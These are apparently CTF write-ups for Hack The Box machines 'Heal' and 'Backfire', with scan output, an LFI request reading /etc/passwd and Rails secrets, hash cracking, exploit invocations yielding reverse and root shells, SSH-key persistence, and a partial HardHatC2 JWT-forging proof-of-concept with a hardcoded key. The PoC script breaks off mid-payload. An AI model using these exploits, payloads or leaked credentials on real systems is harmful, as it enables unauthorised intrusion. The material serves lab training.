Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> more C:\Users\Administrator\Desktop\root.txt
234dfeXXXXXXXXXXXXXXXXXXXXXXXXXX

Heal - HTB

Mon, 24 Feb 2025 00:00:00 GMT

Heal (10.10.11.46)

Enumeration

rustscan -a 10.10.11.46 -- -sC -Pn 

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.46:22
Open 10.10.11.46:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -Pn" on ip 10.10.11.46
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 00:26 +00
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Initiating SYN Stealth Scan at 00:26
Scanning heal.htb (10.10.11.46) [2 ports]
Discovered open port 80/tcp on 10.10.11.46
Discovered open port 22/tcp on 10.10.11.46
Completed SYN Stealth Scan at 00:26, 0.09s elapsed (2 total ports)
NSE: Script scanning 10.10.11.46.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 2.83s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Nmap scan report for heal.htb (10.10.11.46)
Host is up, received user-set (0.053s latency).
Scanned at 2025-02-24 00:26:19 +00 for 3s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
| ssh-hostkey: 
|   256 68:af:80:86:6e:61:7e:bf:0b:ea:10:52:d7:7a:94:3d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFWKy4neTpMZp5wFROezpCVZeStDXH5gI5zP4XB9UarPr/qBNNViyJsTTIzQkCwYb2GwaKqDZ3s60sEZw362L0o=
|   256 52:f4:8d:f1:c7:85:b6:6f:c6:5f:b2:db:a6:17:68:ae (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILMCYbmj9e7GtvnDNH/PoXrtZbCxr49qUY8gUwHmvDKU
80/tcp open  http    syn-ack ttl 63
|_http-title: Heal
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 800D9D6AD40E40173F19D5EE9752AC18

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds
           Raw packets sent: 2 (88B) | Rcvd: 2 (88B)

VHosts

gobuster vhost -u http://heal.htb -w /usr/share/wordlists/dirb/small.txt -k --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://heal.htb
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/wordlists/dirb/small.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: @.heal.htb Status: 400 [Size: 166]
Found: api.heal.htb Status: 200 [Size: 12515]
Found: cgi-bin/.heal.htb Status: 400 [Size: 166]
Progress: 959 / 960 (99.90%)
===============================================================
Finished
===============================================================

gobuster dir -u http://take-survey.heal.htb -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://take-survey.heal.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 162]
/.htaccess            (Status: 403) [Size: 162]
/.htpasswd            (Status: 403) [Size: 162]
/admin                (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/admin/]
/Admin                (Status: 302) [Size: 0] [--> http://take-survey.heal.htb/index.php/admin/authentication/sa/login]
/application          (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/application/]
/assets               (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/assets/]
/docs                 (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/docs/]
/editor               (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/editor/]
/index.php            (Status: 200) [Size: 75816]
/installer            (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/installer/]
/LICENSE              (Status: 200) [Size: 49474]
/locale               (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/locale/]
/modules              (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/modules/]
/plugins              (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/plugins/]
/rest                 (Status: 500) [Size: 45]
/restaurants          (Status: 500) [Size: 45]
/restore              (Status: 500) [Size: 45]
/restored             (Status: 500) [Size: 45]
/restricted           (Status: 500) [Size: 45]
Progress: 3488 / 4615 (75.58%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 3491 / 4615 (75.64%)
===============================================================
Finished
===============================================================

Discovery

heal.htb - Login/Register
api.heal.htb - Rails version: 7.1.4
take-survey.heal.htb - V6.6.64

Rails 7.1.4 CVEs

CVE-2016-7954
- Bundler 1.x might allow remote attackers to inject arbitrary Ruby code into an application by leveraging a gem name collision on a secondary source. NOTE: this might overlap CVE-2013-0334.
CVE-2019-3881
- Bundler prior to 2.1.0 uses a predictable path in /tmp/, created with insecure permissions as a storage location for gems, if locations under the user's home directory are not available. If Bundler is used in a scenario where the user does not have a writable home directory, an attacker could place malicious code in this directory that would be later loaded and executed.
CVE-2021-43809
- Bundler, a Ruby dependency manager, had a vulnerability in versions prior to 2.2.33 where seemingly harmless Gemfiles could execute external code unexpectedly. This occurred when a Gemfile used the git option with invalid values starting with a dash (e.g., -u./payload), which Bundler misinterpreted as command options rather than repository URLs. While Bundler avoided typical command injection by using argument arrays, these dash-prefixed inputs could exploit Git command options (like upload-pack) to run arbitrary code. An attacker would need to craft a malicious Gemfile in a shared directory and trick a victim into running a command like bundle lock, though this required significant user interaction, making it low-risk. Bundler 2.2.33 fixed this by adding -- before positional arguments in Git commands. Users are advised to inspect untrusted Gemfiles before execution, as they can contain arbitrary Ruby code regardless of the patch.

Local File Inclusion

api.heal.htb

GET /download?filename=/etc/passwd HTTP/1.1
Host: api.heal.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoyfQ.73dLFyR_K1A7yY9uDP6xu7H1p_c7DlFQEoN1g-LFFMQ
Origin: http://heal.htb
Referer: http://heal.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

root:x:0:0:root:/root:/bin/bash
postgres:x:116:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ron:x:1001:1001:,,,:/home/ron:/bin/bash

Ok so we found 3 users and we know that we can just SSH to any whenever we get the chance to do do.

Back to our LFI, usually this is the API Structure of Rails Apps

myapi/
├── app/                    # Core app logic
│   ├── controllers/        # Where the downloader lives
│   │   ├── downloads_controller.rb  # THE DOWNLOADER: Vulnerable endpoint
│   │   │   # Example: GET /download?filename=../../config/database.yml
│   │   │   # LFI Path: Use relative (../) or absolute (/etc/passwd) paths
│   │   └── api/v1/         # API-specific controllers
│   │       └── users_controller.rb
│   ├── models/             # DB models
│   │   └── user.rb
│   ├── serializers/        # JSON shaping (optional)
│   └── jobs/               # Background jobs
├── bin/                    # Scripts (e.g., rails)
├── config/                 # ***CRUCIAL FILES HERE***
│   ├── database.yml        # ***CRUCIAL***: DB creds (e.g., postgres password)
│   │   # LFI: ../../config/database.yml from /download
│   ├── routes.rb           # Defines /download route
│   │   # LFI: ../../config/routes.rb (less sensitive, but shows structure)
│   ├── application.rb      # App-wide config
│   ├── environments/       # Env-specific settings
│   │   └── production.rb   # Prod tweaks (e.g., logging)
│   ├── credentials.yml.enc # ***CRUCIAL***: Encrypted secrets (needs master.key)
│   │   # LFI: ../../config/credentials.yml.enc (encrypted, hard to use)
│   ├── master.key          # ***CRUCIAL***: Decrypts credentials.yml.enc
│   │   # LFI: ../../config/master.key (plaintext key, jackpot if found)
├── db/                     # Database files
│   ├── migrate/            # Migration files
│   └── schema.rb           # DB structure (not creds, but useful)
├── lib/                    # Custom code
├── log/                    # ***CRUCIAL FILES HERE***
│   └── production.log      # ***CRUCIAL***: Logs requests, possible poisoning
│       # LFI: ../../log/production.log (read or inject for RCE)
├── public/                 # Static files (downloader’s intended target)
│   └── downloads/          # Expected file dir (e.g., file.pdf)
│       # LFI: ../../public/downloads/file.pdf (safe, intended use)
├── test/                   # Tests
├── tmp/                    # Temp files
│   └── cache/              # Cache data (rarely sensitive)
├── Gemfile                 # Gem deps (useful for vuln hunting)
├── .env                    # ***CRUCIAL***: Env vars (if present)
│   # LFI: ../../.env (plaintext creds like DB_PASSWORD)

PopCorn Time!

../../config/routes.rb

Rails.application.routes.draw do
get '/', to: 'rails/welcome#index'
post 'signup', to: 'authentication#signup'
post 'signin', to: 'authentication#signin'
get 'profile', to: 'authentication#profile'
get 'resume', to: 'authentication#resume'
delete 'logout', to: 'authentication#logout'
post 'exports', to: 'exports#create'
get 'download', to: 'exports#download'
end

./../config/database.yml


# SQLite. Versions 3.8.0 and up are supported.
# gem install sqlite3
#
# Ensure the SQLite 3 gem is defined in your Gemfile
# gem "sqlite3"
#
default: &default
adapter: sqlite3
pool: <%= ENV.fetch("RAILS_MAX_THREADS") { 5 } %>
timeout: 5000

development:
<<: *default database: storage/development.sqlite3 # Warning: The database defined as "test" will be erased and # re-generated from your development database when you run "rake" . # Do not set this db to the same as development or production. test: <<: *default database: storage/test.sqlite3 production: <<: *default database: storage/development.sqlite3

../../config/master.key

23d5052b447ee9376809464f8c141bdf

../../config/credentials.yml.enc

1dMkoxx+3u+vK2g1BWntnRZqGj16vLi5rQJlP/P+pcIpGeK7b12TC2UWjrdx+PoC3iYnMWS2QLK5jnBnaNXDHpEL9oDgc6Ul/9/ghl+3g4AzaFeHy1/yG6SMxA11CMmQhTcSGj1jBMyCT7dgmV6/hfCyb933QHukceAV1NVHqLH9Tcd+WnB3okQhD3NUOLhZ3ivc3wr2pyvxX7ym5kLIjSuHNwRcmMwcXS3e26Bc3Lk9ghUq795a90WfGtV7cIa2TzdY5lbMHHi167IP3zzpUvmY0AcR+WmXHt35WjktrELPe7hR83MRHwTrWt3OmqafsPBufCl1oUY1K2sEIJ8VQjHhrP870ASSS3BpEiGSdrCU53jNVIquJwaE8lg0p3phhMbLXYVVT9QZO1banDh5avfcmSEM--dsbT6QUqCzyNMigC--9SEHtK8HjvpnlvfmWIqoMg==

First of all lets start with the DB, downloaded it and we some interestting credantials but crypted!

ralph@heal.htb:$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG

so after cracking that in the john we get

$ echo 'ralph@heal.htb:$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG' > hash.txt
$ john --format=bcrypt --wordlist=/home/kali/htb/rockyou.txt hash.txt                          
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)

$ john --show hash.txt 
ralph@heal.htb:147258369

1 password hash cracked, 0 left

This didnt work on SSH but it granted us administration over the website:

Which as well gave us access to take-survey.heal.htb/index.php/admin/authentication/sa/login

CVE-2021-44967

So after following this blog we managed to get a php revshell!

on www-data

We went to invetigate further within the limesurvey app and a config.php file was found containing this password

'password' The password used to connect to the database
'connectionString' => 'pgsql:host=localhost;port=5432;user=db_user;password=AdmiDi0_pA$$w0rd;dbname=survey;',
 'password' => 'AdmiDi0_pA$$w0rd',

We tried it on both ralph and ron and it just worked on ron and we found the user flag!

Privilege Escalation

Uploaded Linpeas.sh and found many ports opened

We forwarded the port 8500 through SSH

ssh -L 8500:127.0.0.1:8500 ron@heal.htb

We Discovered that this was Running o Consul Version 1.19.2 which had an RCE

We simply use the exploit.py as following and we get back a rev shell as root!

ron@heal:~$ python3 exploit.py 127.0.0.1 8500 10.10.XX.XXXX 1237 1                                                                                    
[+] Request sent successfully, check your listener

cat /root/root.txt
c91aeca5fe6e2cab95XXXXXXXXXXXXXX
root@heal:~#

Backfire - HTB

Mon, 20 Jan 2025 00:00:00 GMT

Backfire (10.10.11.49)

Enumeration

rustscan -a 10.10.11.49 -- -sC -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.49:22
Open 10.10.11.49:443
Open 10.10.11.49:8000
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -Pn" on ip 10.10.11.49
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 13:24 +00
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:24
Completed Parallel DNS resolution of 1 host. at 13:24, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:24
Scanning 10.10.11.49 [3 ports]
Discovered open port 443/tcp on 10.10.11.49
Discovered open port 22/tcp on 10.10.11.49
Discovered open port 8000/tcp on 10.10.11.49
Completed SYN Stealth Scan at 13:24, 0.08s elapsed (3 total ports)
NSE: Script scanning 10.10.11.49.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:24
Completed NSE at 13:24, 4.42s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
Nmap scan report for 10.10.11.49
Host is up, received user-set (0.055s latency).
Scanned at 2025-02-26 13:24:29 +00 for 5s

PORT     STATE SERVICE  REASON
22/tcp   open  ssh      syn-ack ttl 63
| ssh-hostkey: 
|   256 7d:6b:ba:b6:25:48:77:ac:3a:a2:ef:ae:f5:1d:98:c4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJuxaL9aCVxiQGLRxQPezW3dkgouskvb/BcBJR16VYjHElq7F8C2ByzUTNr0OMeiwft8X5vJaD9GBqoEul4D1QE=
|   256 be:f3:27:9e:c6:d6:29:27:7b:98:18:91:4e:97:25:99 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA2oT7Hn4aUiSdg4vO9rJIbVSVKcOVKozd838ZStpwj8
443/tcp  open  https    syn-ack ttl 63
| tls-alpn: 
|   http/1.1
|   http/1.0
|_  http/0.9
| ssl-cert: Subject: commonName=127.0.0.1/stateOrProvinceName=California/countryName=US/streetAddress=/postalCode=8255/localityName=Los Angeles
| Subject Alternative Name: IP Address:127.0.0.1
| Issuer: commonName=127.0.0.1/stateOrProvinceName=California/countryName=US/streetAddress=/postalCode=8255/localityName=Los Angeles
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-09T04:01:06
| Not valid after:  2028-01-09T04:01:06
| MD5:   f718:9cb7:3989:c809:01af:9693:0e40:7bbb
| SHA-1: 5a85:44d6:d514:b375:65da:febd:6b93:5fe2:b3c4:3912
| -----BEGIN CERTIFICATE-----
| MIIDyDCCArCgAwIBAgIQKdmNsdtYqADk4/UH6SarwDANBgkqhkiG9w0BAQsFADBm
| MQswCQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEUMBIGA1UEBxMLTG9z
| IEFuZ2VsZXMxCTAHBgNVBAkTADENMAsGA1UEERMEODI1NTESMBAGA1UEAxMJMTI3
| LjAuMC4xMB4XDTI1MDEwOTA0MDEwNloXDTI4MDEwOTA0MDEwNlowZjELMAkGA1UE
| BhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFDASBgNVBAcTC0xvcyBBbmdlbGVz
| MQkwBwYDVQQJEwAxDTALBgNVBBETBDgyNTUxEjAQBgNVBAMTCTEyNy4wLjAuMTCC
| ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMVOJitCwlxGYwdRJL5arX3C
| Xy9+SkRdcaaenxU5Ug0jYwa4lGBTjgWufGth0is5xzMy5CXF7QIRwSP8fy/FoRSg
| KX8wfG3DAGFmhACloVPtjoRoBJnvv3rG+XJOCjKPvbUM/kRqoE69hSg30BONaT1d
| 0/F3WsYwUQ9Xcr2gSynma06qVP3fx/Vx1WS6DKUi8DL6v8DUbNbVu2uMG/ggjkPZ
| 7TTomPJ5M5tIwPLg/r67kzzGV5BJQxCk6u2Kap/KN0yN+ax4uBELxF0UQRvgnKXY
| 4FVb8HYLuJty2QSLGHN2c2N5f6k5EmHEEFpLS/g2tNVzCWAMQJemagvwpH+8HtMC
| AwEAAaNyMHAwDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggr
| BgEFBQcDAjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTJaOBt8c6WcsJfMgnQ
| 17/G68o1fjAPBgNVHREECDAGhwR/AAABMA0GCSqGSIb3DQEBCwUAA4IBAQBgQp1z
| ZrJRbR9enUS7phS83tr1iRekTxHRSGEVorR6MVhgvL7f6ajNRg2/LCNoJo2bU1Wj
| TR67Imp93XwzgvameUJHeBsVVMkPQ6Av7eMXGlz610nMeW7euo4tHQn2/thmlpeh
| 6symW7khhtD2u3bCdGfEQz+evvtDipA1bCPOe/lhblvS2M0aef1WSI9fmtqKOcT5
| gGB8u7sA4xeX0lfxr7xUNp6LqbZe2AapEbDPW91npTqC9kOWOq6mVxf8pq/+JKPQ
| eq8g+2I6VYd7xE5kwDfjtIU9/kCs2phwlQui1lyjJfXsQf2o6ZXaXOfHydCpnkHy
| 2TrkpRDVCj6jr9Pk
|_-----END CERTIFICATE-----
|_http-title: 404 Not Found
|_ssl-date: TLS randomness does not represent time
8000/tcp open  http-alt syn-ack ttl 63
|_http-open-proxy: Proxy might be redirecting requests
| http-ls: Volume /
| SIZE  TIME               FILENAME
| 1559  17-Dec-2024 11:31  disable_tls.patch
| 875   17-Dec-2024 11:34  havoc.yaotl
|_
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Index of /

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds
           Raw packets sent: 3 (132B) | Rcvd: 3 (132B)

Data Gathering

Ok this is ironically a server that runs Havoc C2, we were given 2 files disable_tls.patch that shows some changes that were made to remove TLS from the websocket com on the server, which leave it readable if we somehow manage to Mitm and we were also given havoc.yaotl that had Operators creds and basically the hacoc cfg

username: sergej
Websocket management port 40056 - Management port only allows **local** connections

Operators {
    user "ilya" {
        Password = "CobaltStr1keSuckz!"
    }

    user "sergej" {
        Password = "1w4nt2sw1tch2h4rdh4tc2"
    }
}

Listeners {
    Http {
        Name = "Demon Listener"
        Hosts = [
            "backfire.htb"
        ]
        HostBind = "127.0.0.1" 
        PortBind = 8443
        PortConn = 8443
        HostRotation = "round-robin"
        Secure = true
    }
}

Teamserver {
    Host = "127.0.0.1"
    Port = 40056

    Build {
        Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Lets check if any of those users uses the same creds on ssh

Ok so neither of the user allows direct password connections they both use the publickey so lets try to dig elsewhere

Tried to do LFI on the port :8000 to maybe get access to a public key or any other crucial files, it was pretty set to only serve the both files, so I knew I had to look deeper on Havoc.

Upon searching more I came across CVE-2024-41570

Exploitation

POC Script

First of all we open port 1337 for the revshell listener

nc -lvp 1337

then we we use the exploit with the following args:

python3 havoc_ssrf2rce.py  --target https://backfire.htb --lhost 10.10.XX.XXX  --c2user ilya --c2pass 'CobaltStr1keSuckz!'

And just like that! We get the shell access to user ilya

I added my public key so I can ssh connect to it directly!

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC1JVQGReCtTkOeATCWccojCkXZnE1om1F6Uror2OPYFGkWm8W8bVnCgOO1CnE0Ok++XGBPoBohZtnJS/dWtsJ8e9MGy2+Np3MAH1VjfyT4xryB6/j7okOlsPL5T+j4zXRcsbTZvVJaJ/R7j7v1YjPES+vo5eQdcfHhlPsdgiPMJDkofQN2WeroXYACFjXnOs1RHeMe1P8vKmpoKdykfdGeaKcQ+ifSyqPCOFaGQrLAjLYu+5PTdZF5Ptw7s/UBLqHB0rQJWAL3+tvT1MdbXryjey6dzGTOb5GSmNz46aIoAlgoqlVfW6dMbT82QQ5pSVglNju3gzymm+zSjFVACkjMSNGHkbbAHOVYqMp6jZ2UhP4l3GYrZfEiE8bzv1U333w/sFV1oOvYTwUpnYWrEqJs1WHC5KxIcUb9clT75MXxH83E5o230JXyHYxZKghESU2a0+38mQDcNE8/dOBUvrBG9svoiV4bgvssQeQnOzb0RvWpn6l3yTg7W8p+5YYtBnQNI3uP+v1Jh2fjNFKwU97+/co32Y9q+VBIaI/G4IfqzITZAYdClZXL1zSi8caQG4rPMhSIOQ0qUgkUB84npPA8JebUALyu5gP5BIs7w0ScJV4wkCsQ4L1A67xVzqPnoAilfTdDGxJ+plP3zqgynAxovA52qcb0Z8EChQ49mil4aQ== sshkey" >> ~/.ssh/authorized_keys

and from there we can try to look for root escalations

Root Escalation

As usually we run our set of commands and see if you can find anything useful

sudo -l
find / -type d -writable -ls 2>/dev/null
netstat -tulpn
ss -tulpn
ps aux | grep -i "php\|httpd\|apache\|nginx"

netstat showed some pretty juicy stuffs we found 2 new ports running within that didnt come out when we enumerated at first 7096 and 5000

ilya@backfire:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:7096            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:5000            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:40056         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -

so lets try to port forwards those again with ssh and re-enumerate to see if we can find anything interesting

ssh -L 7096:localhost:7096 -L 5000:localhost:5000 ilya@backfire.htb

Tried to re-enumerate again on those ports, didnt get much on the service details:

nmap -sV -sC -Pn -p5000,7096 127.0.0.1
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 15:19 +00
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000035s latency).

PORT     STATE SERVICE VERSION
5000/tcp open  upnp?
7096/tcp open  unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.32 seconds

I tried forcing the Aggresive mode to see if I can squeeze even more for services details

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 15:21 +00
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000034s latency).

PORT     STATE SERVICE     VERSION
5000/tcp open  ssl/upnp?
| ssl-cert: Subject: commonName=HardHat TeamServer
| Not valid before: 2025-02-26T15:20:10
|_Not valid after:  2030-02-26T15:20:10
|_ssl-date: TLS randomness does not represent time
7096/tcp open  ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=HardHat Client
| Subject Alternative Name: DNS:localhost, IP Address:0.0.0.0
| Not valid before: 2024-09-29T00:38:50
|_Not valid after:  2029-09-29T00:38:50
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Length: 0
|     Connection: close
|     Date: Wed, 26 Feb 2025 15:22:39 GMT
|     Server: Kestrel
|   GetRequest: 
|     HTTP/1.1 500 Internal Server Error
|     Connection: close
|     Content-Type: text/plain; charset=utf-8
|     Date: Wed, 26 Feb 2025 15:22:09 GMT
|     Server: Kestrel
|     System.UriFormatException: Invalid URI: The hostname could not be parsed.
|     System.Uri.CreateThis(String uri, Boolean dontEscape, UriKind uriKind, UriCreationOptions& creationOptions)
|     System.Uri..ctor(String uriString, UriKind uriKind)
|     Microsoft.AspNetCore.Components.NavigationManager.set_BaseUri(String value)
|     Microsoft.AspNetCore.Components.NavigationManager.Initialize(String baseUri, String uri)
|     Microsoft.AspNetCore.Components.Server.Circuits.RemoteNavigationManager.Initialize(String baseUri, String uri)
|     Microsoft.AspNetCore.Mvc.ViewFeatures.StaticComponentRenderer.<InitializeStandardComponentServicesAsync>g__InitializeCore|5_0(HttpContext httpContext)
|     Microsoft.AspNetCore.Mvc.ViewFeatures.StaticC
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Length: 0
|     Connection: close
|     Date: Wed, 26 Feb 2025 15:22:10 GMT
|     Server: Kestrel
|   RTSPRequest: 
|     HTTP/1.1 505 HTTP Version Not Supported
|     Content-Length: 0
|     Connection: close
|     Date: Wed, 26 Feb 2025 15:22:10 GMT
|     Server: Kestrel
|   SIPOptions: 
|     HTTP/1.1 505 HTTP Version Not Supported
|     Content-Length: 0
|     Connection: close
|     Date: Wed, 26 Feb 2025 15:22:45 GMT
|     Server: Kestrel
|   SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|     Date: Wed, 26 Feb 2025 15:22:26 GMT
|_    Server: Kestrel

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.29 seconds

And voila! We found out 2 new services one on 5000 running a HardHat C2 and 7096 is basically it’s client port, and we had access to both so let’s check it out!

None of the previous havoc credantials works with hardhat but I found out that the way this works is that it automatically generates a secure password for the HardHat_Admin account during the startup and this password is printed to the console a single time.

HardHat

Authentication Bypass

However, HardHatC2 relies on a static JWT signing key that allows unauthenticated creation of valid access tokens for any role.

Although the HardHat_Admin password may be complex, the static JWT key overrides this security measure by allowing an Attacker to craft their own valid tokens.

POC

# @author Siam Thanat Hack Co., Ltd. (STH)
import jwt
import datetime
import uuid
import requests

rhost = '127.0.0.1:5000'

# Craft Admin JWT
secret = "jtee43gt-6543-2iur-9422-83r5w27hgzaq"
issuer = "hardhatc2.com"
now = datetime.datetime.utcnow()

expiration = now + datetime.timedelta(days=28)
payload = {
    "sub": "HardHat_Admin",  
